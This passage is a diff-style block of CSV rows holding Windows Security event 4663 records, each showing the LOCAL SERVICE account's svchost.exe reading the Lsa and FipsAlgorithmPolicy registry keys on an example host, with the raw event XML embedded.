+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452897</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452896</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452895</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452894</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452893</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452891</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452890</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452889</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452888</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452887</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452886</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452885</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452884</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452883</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452882</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
